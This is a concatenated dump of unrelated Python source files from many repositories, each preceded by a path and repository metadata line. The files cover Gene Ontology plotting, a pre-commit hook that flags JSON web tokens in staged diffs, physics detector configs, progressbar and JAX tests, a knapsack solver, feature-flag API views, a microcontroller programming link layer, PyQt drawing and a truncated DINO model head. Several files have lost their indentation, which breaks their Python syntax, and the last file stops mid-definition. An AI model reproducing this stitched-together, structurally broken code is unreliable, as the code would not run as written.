# scripts/go_plot.py --go_file=i126_goids_baseline.txt -r --obo=tests/data/viral_gene_silence.obo -o i126_goids_baseline.png
fout_gos = 'i126_goids_baseline.txt'
with open(fout_gos, 'w') as prt:
prt.write('#cafffb {SRC_GO}\n'.format(SRC_GO=next(iter(gosubdag_r0.go_sources))))
_prt_goterms(r1_ancestors_more, gosubdag_r1.go2nt, prt)
print(' WROTE: {GOs}'.format(GOs=fout_gos))
def _prt_goterms(goids, go2nt, prt):
"""Print details of GO terms"""
fmt = ('#ffd1df {GO} # {NS} {dcnt:5} {childcnt:3} '
'L{level:02} D{depth:02} R{reldepth:02} {D1:5} {REL} {rel} {GO_name}\n')
nts = [nt for go, nt in go2nt.items() if go in goids]
for ntd in sorted(nts, key=lambda nt: nt.dcnt, reverse=True):
prt.write(fmt.format(**ntd._asdict()))
#cafffb GO:0060150
#ffd1df GO:0050794 # BP 8278 64 D03 R03 regulation of cellular process
#ffd1df GO:0019222 # BP 3382 20 D03 R03 regulation of metabolic process
#ffd1df GO:0048522 # BP 2417 65 D04 R04 positive regulation of cellular process
#ffd1df GO:0060255 # BP 2130 20 D04 R04 regulation of macromolecule metabolic process
#ffd1df GO:0010468 # BP 862 20 D05 R05 regulation of gene expression
#ffd1df GO:0060968 # BP 53 4 D06 R08 regulation of gene silencing
#ffd1df GO:0060147 # BP 24 4 D07 R09 regulation of posttranscriptional gene silencing
#ffd1df GO:0060148 # BP 8 3 D08 R10 positive regulation of posttranscriptional gene silencing
#ffd1df GO:0060150 # BP 0 0 D09 R11 viral triggering of virus induced gene silencing
# - Generate GO DAG subset for this test ---------------------------------------------------------
def _wr_sub_obo(fout_obo, goid_chosen, godag_r1, fin_obo):
"""Sub plot used for visualizing this test file's elements"""
# Load GO-DAG: Load optional 'relationship'
godag = {go:o for go, o in godag_r1.items() if go == o.item_id}
_prt_rtel_ctr(godag)
rels_all = set(['part_of', 'regulates', 'negatively_regulates', 'positively_regulates'])
goids_leaf_all = set(o.id for o in godag.values() if not o.children)
gosubdag_r1 = GoSubDag(goids_leaf_all, godag, relationships=True, prt=sys.stdout)
goids_src_r1_all = _get_leafs_w_relsinhier(rels_all, gosubdag_r1)
gosubdag_r1.prt_goids(goids_src_r1_all)
# Pick one of the GO IDs as a source for the subset DAG
gosubdag_viral = GoSubDag({goid_chosen}, godag, relationships=True, prt=sys.stdout)
goids_viral = set(gosubdag_viral.go2obj.keys())
with open(fout_obo, 'w') as prt:
WrSubObo.prt_goterms(fin_obo, goids_viral, prt)
print('{N} GO IDs WROTE: {OBO}'.format(N=len(goids_viral), OBO=fout_obo))
# Plot obo subset
pat_r1 = '{REPO}/scripts/go_plot.py {GO} -o {PNG} -r'
pat_r0 = '{REPO}/scripts/go_plot.py {GO} -o {PNG}'
system(pat_r1.format(REPO=REPO, PNG=fout_obo.replace('.obo', '_r1.png'), GO=goid_chosen))
system(pat_r0.format(REPO=REPO, PNG=fout_obo.replace('.obo', '_r0.png'), GO=goid_chosen))
def _get_leafs_w_relsinhier(rels_usr, gosubdag_r1):
"""Get GO IDs that have all relationships up their hierarchy."""
gos_r1_relsinhier = set()
goids_leaf = set(o.id for o in gosubdag_r1.go2obj.values() if not o.children)
for goid in goids_leaf:
go_parents = gosubdag_r1.rcntobj.go2ancestors[goid]
rels = set(k for p in go_parents for k in gosubdag_r1.go2obj[p].relationship.keys())
if rels == rels_usr:
gos_r1_relsinhier.add(goid)
return gos_r1_relsinhier
def _prt_rtel_ctr(godag):
"""Print the count of relationships."""
objs_r1_all = set(o for o in godag.values() if o.relationship.keys())
octr = cx.Counter(k for o in objs_r1_all for k in o.relationship.keys())
# objs_r1_sub = set(o.id for o in objs_r1_all if not rels_all.isdisjoint(o.relationship.keys()))
print('{N:6,} GO Terms have relationships.'.format(N=len(objs_r1_all)))
for key, cnt in octr.most_common():
print('{N:6,} {REL}'.format(N=cnt, REL=key))
# def _chk_child_parent(go2o_dag, go2o_sub):
# """Check the differences between the two go2obb dicts."""
# pass
if __name__ == '__main__':
test_gosubdag_relationships(len(sys.argv) != 1)
# Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved.
|
.githooks/pre-commit-python.py | eshepelyuk/gloo | 3,506 | 12795733 | #!/usr/bin/python3
# This script runs whenever a user tries to commit something in this repo.
# It checks the commit for any text that resembles an encoded JSON web token,
# and asks the user to verify that they want to commit a JWT if it finds any.
import sys
import subprocess
import re
import base64
import binascii
import unittest
# run test like so:
# (cd .githooks/; python -m unittest pre-commit-python.py)
class TestStringMethods(unittest.TestCase):
def test_jwts(self):
self.assertTrue(contains_jwt(["<KEY>"]))
self.assertTrue(contains_jwt(["<KEY>"]))
def test_ok(self):
self.assertFalse(contains_jwt(["test test"]))
self.assertFalse(contains_jwt(["thisisnotajwteventhoughitisalongstring"]))
def contains_jwt(lines):
jwtPattern = re.compile('JWT|iat|name|sub|alg|exp|k')
raiseIssue = False
for line in lines:
# try to find long (20+ character) words consisting only of valid JWT characters
longTokens = re.findall("[A-Za-z0-9_=-]{20,}", line)
        # try to decode any found tokens and see if they look like a JSON fragment
        # where "looks like a JSON fragment" is defined as "contains any of the words in the 'jwtPattern' regex pattern"
for token in longTokens:
try:
# python's base64 decoder fails if padding is missing; but does not fail if there's
# extra padding; so always add padding
utfOut = base64.urlsafe_b64decode(token+'==').decode("utf-8")
match = jwtPattern.search(utfOut)
if match:
print("Probable JWT found in commit: " + token + " gets decoded into: " + utfOut)
raiseIssue = True
# be very specific about the exceptions we ignore:
except (UnicodeDecodeError, binascii.Error) as e:
continue
return raiseIssue
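# Editorial example (not called by the hook): contains_jwt() flags long
# base64url words that decode to JWT-like JSON. The payload below is made up
# for illustration and is not a real credential.
def _example_contains_jwt():
    fake_payload = base64.urlsafe_b64encode(b'{"alg":"none","sub":"test"}').decode("ascii")
    return contains_jwt(["+ some diff line with " + fake_payload])  # expected: True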
def main():
#get git diff lines
lines = subprocess.check_output(['git', 'diff', '--staged']).decode("utf-8").split('\n')
# filter out short lines and lines that don't begin with a '+' to only
# test longer, newly added text
filteredLines = list(filter(lambda line : len(line) > 20 and line[0] == '+', lines))
# found a likely JWT, send user through prompt sequence to double check
if contains_jwt(filteredLines):
prompt = "This commit appears to add a JSON web token, which is often accidental and can be problematic (unless it's for a test). Are you sure you want to commit these changes? (y/n): "
failCount = 0
while True:
inputLine = input(prompt).lower()
if len(inputLine) > 0 and inputLine[0] == 'y':
print("OK, proceeding with commit")
return 0
elif len(inputLine) > 0 and inputLine[0] == 'n':
print("Aborting commit")
return 1
elif failCount == 0:
prompt = "Please answer with 'y' or 'n'. Do you wish to proceed with this commit?: "
elif failCount == 1:
prompt = "That's still neither a 'y' nor an 'n'. Do you wish to proceed with this commit?: "
else:
prompt = "You've entered an incorrect input " + str(failCount) + " times now. Please respond with 'y' or 'n' (sans apostrophes) regarding whether or not you wish to proceed with this commit which possibly contains a JWT: "
failCount += 1
else:
print("No likely JWTs found, proceeding with commit")
return 0
if __name__ == "__main__":
sys.exit(main())
|
DQM/CSCMonitorModule/python/csc_dqm_masked_hw_cfi.py | ckamtsikis/cmssw | 852 | 12795741 | <reponame>ckamtsikis/cmssw<filename>DQM/CSCMonitorModule/python/csc_dqm_masked_hw_cfi.py<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
#--------------------------
# Masked HW Elements
#--------------------------
CSCMaskedHW = cms.untracked.vstring(
# == Post LS1 - All ME4/2 chambers should be enabled
# == mask most or ME+4/2 chambers, except 9,10,11,12,13
#'1,4,2,1,*,*,*',
#'1,4,2,2,*,*,*',
#'1,4,2,3,*,*,*',
#'1,4,2,4,*,*,*',
#'1,4,2,5,*,*,*',
#'1,4,2,6,*,*,*',
#'1,4,2,7,*,*,*',
#'1,4,2,8,*,*,*',
#'1,4,2,14,*,*,*',
#'1,4,2,15,*,*,*',
#'1,4,2,16,*,*,*',
#'1,4,2,17,*,*,*',
#'1,4,2,18,*,*,*',
#'1,4,2,19,*,*,*',
#'1,4,2,20,*,*,*',
#'1,4,2,21,*,*,*',
#'1,4,2,22,*,*,*',
#'1,4,2,23,*,*,*',
#'1,4,2,24,*,*,*',
#'1,4,2,25,*,*,*',
#'1,4,2,26,*,*,*',
#'1,4,2,27,*,*,*',
#'1,4,2,28,*,*,*',
#'1,4,2,29,*,*,*',
#'1,4,2,30,*,*,*',
#'1,4,2,31,*,*,*',
#'1,4,2,32,*,*,*',
#'1,4,2,33,*,*,*',
#'1,4,2,34,*,*,*',
#'1,4,2,35,*,*,*',
#'1,4,2,36,*,*,*',
# == mask all ME-4/2 chambers
#'2,4,2,*,*,*,*',
)
|
tests/test_custom_widgets.py | jerryc05/python-progressbar | 806 | 12795758 | <gh_stars>100-1000
import time
import progressbar
class CrazyFileTransferSpeed(progressbar.FileTransferSpeed):
"It's bigger between 45 and 80 percent"
def update(self, pbar):
if 45 < pbar.percentage() < 80:
return 'Bigger Now ' + progressbar.FileTransferSpeed.update(self,
pbar)
else:
return progressbar.FileTransferSpeed.update(self, pbar)
def test_crazy_file_transfer_speed_widget():
widgets = [
# CrazyFileTransferSpeed(),
' <<<',
progressbar.Bar(),
'>>> ',
progressbar.Percentage(),
' ',
progressbar.ETA(),
]
p = progressbar.ProgressBar(widgets=widgets, max_value=1000)
# maybe do something
p.start()
for i in range(0, 200, 5):
# do something
time.sleep(0.1)
p.update(i + 1)
p.finish()
def test_variable_widget_widget():
widgets = [
' [', progressbar.Timer(), '] ',
progressbar.Bar(),
' (', progressbar.ETA(), ') ',
progressbar.Variable('loss'),
progressbar.Variable('text'),
progressbar.Variable('error', precision=None),
progressbar.Variable('missing'),
progressbar.Variable('predefined'),
]
p = progressbar.ProgressBar(widgets=widgets, max_value=1000,
variables=dict(predefined='predefined'))
p.start()
print('time', time, time.sleep)
for i in range(0, 200, 5):
time.sleep(0.1)
p.update(i + 1, loss=.5, text='spam', error=1)
i += 1
p.update(i, text=None)
i += 1
p.update(i, text=False)
i += 1
p.update(i, text=True, error='a')
p.finish()
def test_format_custom_text_widget():
widget = progressbar.FormatCustomText(
'Spam: %(spam).1f kg, eggs: %(eggs)d',
dict(
spam=0.25,
eggs=3,
),
)
bar = progressbar.ProgressBar(widgets=[
widget,
])
for i in bar(range(5)):
widget.update_mapping(eggs=i * 2)
assert widget.mapping['eggs'] == bar.widgets[0].mapping['eggs']
|
Algorithms/Dynamic_Programming/0-1_Knapsack_Problem/knapsack_problem_0_1.py | arslantalib3/algo_ds_101 | 182 | 12795769 | <reponame>arslantalib3/algo_ds_101<filename>Algorithms/Dynamic_Programming/0-1_Knapsack_Problem/knapsack_problem_0_1.py
#0/1 Knapsack problem
def knapsack(val, wt, N, C):
    # table[i][c] = best total value using only the first i items with capacity c
    table = [[ 0 for _ in range(0, C+1)] for _ in range(0, N+1)]
    table[0][0] = 0
    for i in range(1, N+1):
        for c in range(1, C+1):
            if c - wt[i-1] < 0:
                # item i does not fit in capacity c: carry over the best value without it
                table[i][c] = table[i-1][c]
            else:
                # either skip item i, or take it and add its value to the remaining capacity
                table[i][c] = max(table[i-1][c], table[i-1][c-wt[i-1]]+val[i-1])
    return table[N][C]
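# Worked example (illustrative): values 60/100/120, weights 10/20/30, capacity 50.
# The best choice takes the items of weight 20 and 30 for a value of 100 + 120 = 220.
def _example():
    assert knapsack([60, 100, 120], [10, 20, 30], 3, 50) == 220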
N = int(input().strip())
W = int(input().strip()) # capacity
val = [ int(v) for v in input().strip().split(" ")]
wt = [ int(w) for w in input().strip().split(" ")]
print(knapsack(val, wt, N, W)) |
api/edge_api/identities/views.py | SolidStateGroup/Bullet-Train-API | 126 | 12795795 | import base64
import json
import typing
import marshmallow
from boto3.dynamodb.conditions import Key
from drf_yasg2.utils import swagger_auto_schema
from flag_engine.api.schemas import APITraitSchema
from flag_engine.identities.builders import (
build_identity_dict,
build_identity_model,
)
from rest_framework import status, viewsets
from rest_framework.decorators import action
from rest_framework.exceptions import NotFound, ValidationError
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from app.pagination import EdgeIdentityPagination
from edge_api.identities.serializers import (
EdgeIdentityFeatureStateSerializer,
EdgeIdentityFsQueryparamSerializer,
EdgeIdentitySerializer,
EdgeIdentityTraitsSerializer,
)
from environments.identities.models import Identity
from environments.models import Environment
from environments.permissions.constants import MANAGE_IDENTITIES
from environments.permissions.permissions import NestedEnvironmentPermissions
from features.permissions import IdentityFeatureStatePermissions
from projects.exceptions import DynamoNotEnabledError
from .exceptions import TraitPersistenceError
trait_schema = APITraitSchema()
class EdgeIdentityViewSet(viewsets.ModelViewSet):
serializer_class = EdgeIdentitySerializer
pagination_class = EdgeIdentityPagination
lookup_field = "identity_uuid"
dynamo_identifier_search_functions = {
"EQUAL": lambda identifier: Key("identifier").eq(identifier),
"BEGINS_WITH": lambda identifier: Key("identifier").begins_with(identifier),
}
def initial(self, request, *args, **kwargs):
environment = self.get_environment_from_request()
if not environment.project.enable_dynamo_db:
raise DynamoNotEnabledError()
super().initial(request, *args, **kwargs)
def _get_search_function_and_value(
self,
search_query: str,
) -> typing.Tuple[typing.Callable, str]:
if search_query.startswith('"') and search_query.endswith('"'):
return self.dynamo_identifier_search_functions[
"EQUAL"
], search_query.replace('"', "")
return self.dynamo_identifier_search_functions["BEGINS_WITH"], search_query
def get_object(self):
return Identity.dynamo_wrapper.get_item_from_uuid_or_404(
self.kwargs["identity_uuid"]
)
def get_queryset(self):
page_size = self.pagination_class().get_page_size(self.request)
previous_last_evaluated_key = self.request.GET.get("last_evaluated_key")
search_query = self.request.query_params.get("q")
start_key = None
if previous_last_evaluated_key:
start_key = json.loads(base64.b64decode(previous_last_evaluated_key))
if not search_query:
return Identity.dynamo_wrapper.get_all_items(
self.kwargs["environment_api_key"], page_size, start_key
)
search_func, search_identifier = self._get_search_function_and_value(
search_query
)
identity_documents = Identity.dynamo_wrapper.search_items_with_identifier(
self.kwargs["environment_api_key"],
search_identifier,
search_func,
page_size,
start_key,
)
return identity_documents
def get_permissions(self):
return [
IsAuthenticated(),
NestedEnvironmentPermissions(
action_permission_map={
"retrieve": MANAGE_IDENTITIES,
"get_traits": MANAGE_IDENTITIES,
"update_traits": MANAGE_IDENTITIES,
}
),
]
def get_environment_from_request(self):
"""
Get environment object from URL parameters in request.
"""
return Environment.objects.get(api_key=self.kwargs["environment_api_key"])
def perform_destroy(self, instance):
Identity.dynamo_wrapper.delete_item(instance["composite_key"])
@swagger_auto_schema(
responses={200: EdgeIdentityTraitsSerializer(many=True)},
)
@action(detail=True, methods=["get"], url_path="list-traits")
def get_traits(self, request, *args, **kwargs):
identity = self.get_object()
data = trait_schema.dump(identity["identity_traits"], many=True)
return Response(data=data, status=status.HTTP_200_OK)
@swagger_auto_schema(
method="put",
request_body=EdgeIdentityTraitsSerializer,
responses={200: EdgeIdentityTraitsSerializer()},
)
@action(detail=True, methods=["put"], url_path="update-traits")
def update_traits(self, request, *args, **kwargs):
environment = self.get_environment_from_request()
if not environment.project.organisation.persist_trait_data:
raise TraitPersistenceError()
identity = build_identity_model(self.get_object())
try:
trait = trait_schema.load(request.data)
except marshmallow.ValidationError as validation_error:
raise ValidationError(validation_error) from validation_error
identity.update_traits([trait])
Identity.dynamo_wrapper.put_item(build_identity_dict(identity))
data = trait_schema.dump(trait)
return Response(data, status=status.HTTP_200_OK)
class EdgeIdentityFeatureStateViewSet(viewsets.ModelViewSet):
permission_classes = [IsAuthenticated, IdentityFeatureStatePermissions]
lookup_field = "featurestate_uuid"
serializer_class = EdgeIdentityFeatureStateSerializer
# Patch is not supported
http_method_names = [
"get",
"post",
"put",
"delete",
"head",
"options",
"trace",
]
pagination_class = None
def initial(self, request, *args, **kwargs):
super().initial(request, *args, **kwargs)
identity_document = Identity.dynamo_wrapper.get_item_from_uuid_or_404(
self.kwargs["edge_identity_identity_uuid"]
)
self.identity = build_identity_model(identity_document)
def get_object(self):
featurestate_uuid = self.kwargs["featurestate_uuid"]
try:
featurestate = next(
filter(
lambda fs: fs.featurestate_uuid == featurestate_uuid,
self.identity.identity_features,
)
)
except StopIteration:
raise NotFound()
return featurestate
@swagger_auto_schema(query_serializer=EdgeIdentityFsQueryparamSerializer())
def list(self, request, *args, **kwargs):
q_params_serializer = EdgeIdentityFsQueryparamSerializer(
data=self.request.query_params
)
q_params_serializer.is_valid(raise_exception=True)
identity_features = self.identity.identity_features
feature = q_params_serializer.data.get("feature")
if feature:
identity_features = filter(
lambda fs: fs.feature.id == feature, identity_features
)
serializer = self.get_serializer(identity_features, many=True)
return Response(data=serializer.data, status=status.HTTP_200_OK)
def perform_destroy(self, instance):
self.identity.identity_features.remove(instance)
Identity.dynamo_wrapper.put_item(build_identity_dict(self.identity))
|
updi/link.py | leonerd/pyupdi | 197 | 12795814 | <reponame>leonerd/pyupdi
"""
Link layer in UPDI protocol stack
"""
import logging
import time
from updi.physical import UpdiPhysical
import updi.constants as constants
class UpdiDatalink(object):
"""
UPDI data link class handles the UPDI data protocol within the device
"""
def __init__(self, comport, baud):
self.logger = logging.getLogger("link")
        self.use24bit = False
        # Create a UPDI physical connection
        self.updi_phy = UpdiPhysical(comport, baud)
# Initialise
self.init()
# Check
if not self.check():
# Send double break if all is not well, and re-check
self.updi_phy.send_double_break()
self.init()
if not self.check():
raise Exception("UPDI initialisation failed")
def set_24bit_updi(self, mode):
self.logger.info("Using 24-bit updi")
self.use24bit = mode
def init(self):
"""
Set the inter-byte delay bit and disable collision detection
"""
self.stcs(constants.UPDI_CS_CTRLB, 1 << constants.UPDI_CTRLB_CCDETDIS_BIT)
self.stcs(constants.UPDI_CS_CTRLA, 1 << constants.UPDI_CTRLA_IBDLY_BIT)
def check(self):
"""
Check UPDI by loading CS STATUSA
"""
if self.ldcs(constants.UPDI_CS_STATUSA) != 0:
self.logger.info("UPDI init OK")
return True
self.logger.info("UPDI not OK - reinitialisation required")
return False
def ldcs(self, address):
"""
Load data from Control/Status space
"""
self.logger.info("LDCS from 0x{0:02X}".format(address))
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_LDCS | (address & 0x0F)])
response = self.updi_phy.receive(1)
if len(response) != 1:
# Todo - flag error
return 0x00
return response[0]
def stcs(self, address, value):
"""
Store a value to Control/Status space
"""
self.logger.info("STCS 0x{0:02X} to 0x{1:02X}".format(value, address))
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_STCS | (address & 0x0F), value])
def ld(self, address):
"""
Load a single byte direct from a 16/24-bit address
"""
self.logger.info("LD from 0x{0:06X}".format(address))
if self.use24bit:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_LDS | constants.UPDI_ADDRESS_24 | constants.UPDI_DATA_8,
address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF])
else:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_LDS | constants.UPDI_ADDRESS_16 | constants.UPDI_DATA_8,
address & 0xFF, (address >> 8) & 0xFF])
return self.updi_phy.receive(1)[0]
def ld16(self, address):
"""
Load a 16-bit word directly from a 16/24-bit address
"""
self.logger.info("LD from 0x{0:06X}".format(address))
if self.use24bit:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_LDS | constants.UPDI_ADDRESS_24 | constants.UPDI_DATA_16,
address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF])
else:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_LDS | constants.UPDI_ADDRESS_16 | constants.UPDI_DATA_16,
address & 0xFF, (address >> 8) & 0xFF])
return self.updi_phy.receive(2)
def st(self, address, value):
"""
Store a single byte value directly to a 16/24-bit address
"""
self.logger.info("ST to 0x{0:06X}".format(address))
if self.use24bit:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_STS | constants.UPDI_ADDRESS_24 | constants.UPDI_DATA_8,
address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF])
else:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_STS | constants.UPDI_ADDRESS_16 | constants.UPDI_DATA_8,
address & 0xFF, (address >> 8) & 0xFF])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("Error with st")
self.updi_phy.send([value & 0xFF])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("Error with st")
def st16(self, address, value):
"""
Store a 16-bit word value directly to a 16/24-bit address
"""
self.logger.info("ST to 0x{0:06X}".format(address))
if self.use24bit:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_STS | constants.UPDI_ADDRESS_24 | constants.UPDI_DATA_16,
address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF])
else:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_STS | constants.UPDI_ADDRESS_16 | constants.UPDI_DATA_16,
address & 0xFF, (address >> 8) & 0xFF])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("Error with st")
self.updi_phy.send([value & 0xFF, (value >> 8) & 0xFF])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("Error with st")
def ld_ptr_inc(self, size):
"""
Loads a number of bytes from the pointer location with pointer post-increment
"""
self.logger.info("LD8 from ptr++")
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_LD | constants.UPDI_PTR_INC |
constants.UPDI_DATA_8])
return self.updi_phy.receive(size)
def ld_ptr_inc16(self, words):
"""
Load a 16-bit word value from the pointer location with pointer post-increment
"""
self.logger.info("LD16 from ptr++")
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_LD | constants.UPDI_PTR_INC |
constants.UPDI_DATA_16])
return self.updi_phy.receive(words << 1)
def st_ptr(self, address):
"""
Set the pointer location
"""
self.logger.info("ST to ptr")
if self.use24bit:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_ST | constants.UPDI_PTR_ADDRESS | constants.UPDI_DATA_24,
address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF])
else:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_ST | constants.UPDI_PTR_ADDRESS | constants.UPDI_DATA_16,
address & 0xFF, (address >> 8) & 0xFF])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("Error with st_ptr")
def st_ptr_inc(self, data):
"""
Store data to the pointer location with pointer post-increment
"""
self.logger.info("ST8 to *ptr++")
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_ST | constants.UPDI_PTR_INC | constants.UPDI_DATA_8,
data[0]])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("ACK error with st_ptr_inc")
n = 1
while n < len(data):
self.updi_phy.send([data[n]])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("Error with st_ptr_inc")
n += 1
def st_ptr_inc16(self, data):
"""
Store a 16-bit word value to the pointer location with pointer post-increment
Disable acks when we do this, to reduce latency.
"""
self.logger.info("ST16 to *ptr++")
ctrla_ackon = 1 << constants.UPDI_CTRLA_IBDLY_BIT # with acks enabled.
ctrla_ackoff = ctrla_ackon | (1 << constants.UPDI_CTRLA_RSD_BIT) # acks off. (RSD)
# (Response signature disable)
self.stcs(constants.UPDI_CS_CTRLA, ctrla_ackoff)
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_ST | constants.UPDI_PTR_INC |
constants.UPDI_DATA_16] )
self.updi_phy.send(data) # No response expected.
# Re-enable acks
self.stcs(constants.UPDI_CS_CTRLA, ctrla_ackon)
def repeat(self, repeats):
"""
Store a value to the repeat counter
"""
if (repeats - 1) > constants.UPDI_MAX_REPEAT_SIZE:
raise Exception("Invalid repeat count!")
self.logger.info("Repeat {0:d}".format(repeats))
repeats -= 1
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_REPEAT | constants.UPDI_REPEAT_BYTE,
repeats & 0xFF])
def read_sib(self):
"""
Read the SIB
"""
return self.updi_phy.sib()
def key(self, size, key):
"""
Write a key
"""
self.logger.info("Writing key")
if len(key) != 8 << size:
raise Exception("Invalid KEY length!")
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_KEY | constants.UPDI_KEY_KEY | size])
self.updi_phy.send(list(reversed(list(key))))
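# Editorial usage sketch (not part of pyupdi): open the data link on a serial
# port and read the System Information Block. The port name is a placeholder.
def _example_read_sib(comport="/dev/ttyUSB0", baud=115200):
    link = UpdiDatalink(comport, baud)
    return link.read_sib()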
|
src/test/tests/databases/xform_precision.py | visit-dav/vis | 226 | 12795852 | # ----------------------------------------------------------------------------
# CLASSES: nightly
#
# Test Case: xform_precision.py
#
# Tests: Transform manager's conversion to float
#
# Programmer: <NAME>
# Date: September 24, 2006
#
# Modifications:
#
# <NAME>, Wed Jan 20 07:37:11 PST 2010
#    Added ability to switch between Silo's HDF5 and PDB data.
# ----------------------------------------------------------------------------
OpenDatabase(silo_data_path("quad_disk.silo"))
#
# Turn off force single precision for this test
#
readOptions=GetDefaultFileOpenOptions("Silo")
readOptions["Force Single"] = 0
SetDefaultFileOpenOptions("Silo", readOptions)
#
# Test ordinary float data (no conversion) first
#
AddPlot("Mesh","mesh")
DrawPlots()
Test("float_xform_01")
DeleteAllPlots()
#
# Ok, now read a mesh with double coords
#
AddPlot("Mesh","meshD")
DrawPlots()
Test("float_xform_02")
DeleteAllPlots()
CloseDatabase(silo_data_path("quad_disk.silo"))
OpenDatabase(silo_data_path("quad_disk.silo"))
#
# test float data on a float mesh
#
AddPlot("Pseudocolor","sphElev_on_mesh")
DrawPlots()
Test("float_xform_03")
DeleteAllPlots()
#
# test float data on a double mesh
#
AddPlot("Pseudocolor","sphElev_on_meshD")
DrawPlots()
Test("float_xform_04")
DeleteAllPlots()
#
# test double data on a float mesh
#
AddPlot("Pseudocolor","sphElevD_on_mesh")
DrawPlots()
Test("float_xform_05")
DeleteAllPlots()
CloseDatabase(silo_data_path("quad_disk.silo"))
OpenDatabase(silo_data_path("quad_disk.silo"))
#
# test double data on a double mesh
#
AddPlot("Pseudocolor","sphElevD_on_meshD")
DrawPlots()
Test("float_xform_06")
DeleteAllPlots()
Exit()
|
qt__pyqt__pyside__pyqode/pyqt5__draw_text_with_word_wrap.py | DazEB2/SimplePyScripts | 117 | 12795866 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from PyQt5.QtGui import QPixmap, QPainter, QFont
from PyQt5.QtWidgets import QApplication, QLabel
from PyQt5.QtCore import Qt, QRect
app = QApplication([])
text = "Hello World!"
pixmap = QPixmap(180, 130)
pixmap.fill(Qt.white)
painter = QPainter(pixmap)
painter.setFont(QFont('Arial', 12))
rect = QRect(0, 0, 70, 50)
painter.drawRect(rect)
painter.drawText(rect, Qt.TextWordWrap, text)
rect = QRect(0, 60, 70, 50)
painter.drawRect(rect)
painter.drawText(rect, Qt.AlignLeft, text)
w = QLabel()
w.setPixmap(pixmap)
w.show()
app.exec()
|
playground/jax_basic/test_pmap.py | yf225/alpa | 114 | 12795916 | <reponame>yf225/alpa
from functools import partial
import jax
from jax import lax
import jax.numpy as jnp
def debug_pmap():
@jax.pmap
def func(x, w):
return x @ w
y = func(jnp.ones((2, 4)), jnp.ones((2, 4)))
print(y, type(y))
def test_nested_pmap():
@partial(jax.pmap, axis_name='a0', in_axes=(0, None), out_axes=0)
def add(a, b):
# a.shape = (32, 64)
# b.shape = (64, 2, 32)
@partial(jax.pmap, axis_name='a1', in_axes=(None, 1), out_axes=1)
def add_inner(x, y):
# x.shape = (32, 64)
# y.shape = (64, 32)
return x @ y
# ret.shape = (32, 2, 32)
ret = add_inner(a, b)
return ret
a = jnp.ones((2, 32, 64))
b = jnp.ones((64, 2, 32))
#jaxpr = jax.make_jaxpr(add)(a, b)
#print(jaxpr)
#print(jaxpr.jaxpr.outvars[0].aval.shape)
c = add(a, b)
print(c)
def test_allreduce_sum():
@partial(jax.pmap, axis_name='i')
def normalize(x):
return x / lax.psum(x, 'i')
print(normalize(jnp.arange(2)))
if __name__ == "__main__":
#debug_pmap()
#test_nested_pmap()
test_allreduce_sum()
|
self_supervised/vision/dino.py | jwuphysics/self_supervised | 243 | 12795932 | <gh_stars>100-1000
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/15 - dino.ipynb (unless otherwise specified).
__all__ = ['DINOHead', 'get_dino_aug_pipelines', 'DINOModel', 'DINO']
# Cell
from fastai.vision.all import *
from ..augmentations import *
from ..layers import *
from ..models.vision_transformer import *
# Cell
class DINOHead(nn.Module):
    '''
    DINO projection head.
    Note: a module wrapped with nn.utils.weight_norm cannot be copy.deepcopy-ed
    (RuntimeError: Only Tensors created explicitly by the user (graph leaves)
    support the deepcopy protocol at the moment), so the teacher head must be
    constructed separately rather than deep-copied from the student.
    https://pytorch.org/docs/stable/generated/torch.nn.utils.weight_norm.html
    https://pytorch.org/docs/stable/generated/torch.nn.GELU.html
    '''
def __init__(self, in_dim, out_dim, use_bn=False, norm_last_layer=True, nlayers=3, hidden_dim=2048, bottleneck_dim=256):
super().__init__()
nlayers = max(nlayers, 1)
if nlayers == 1:
self.mlp = nn.Linear(in_dim, bottleneck_dim)
else:
layers = [nn.Linear(in_dim, hidden_dim)]
if use_bn:
layers.append(nn.BatchNorm1d(hidden_dim))
layers.append(nn.GELU())
for _ in range(nlayers - 2):
layers.append(nn.Linear(hidden_dim, hidden_dim))
if use_bn:
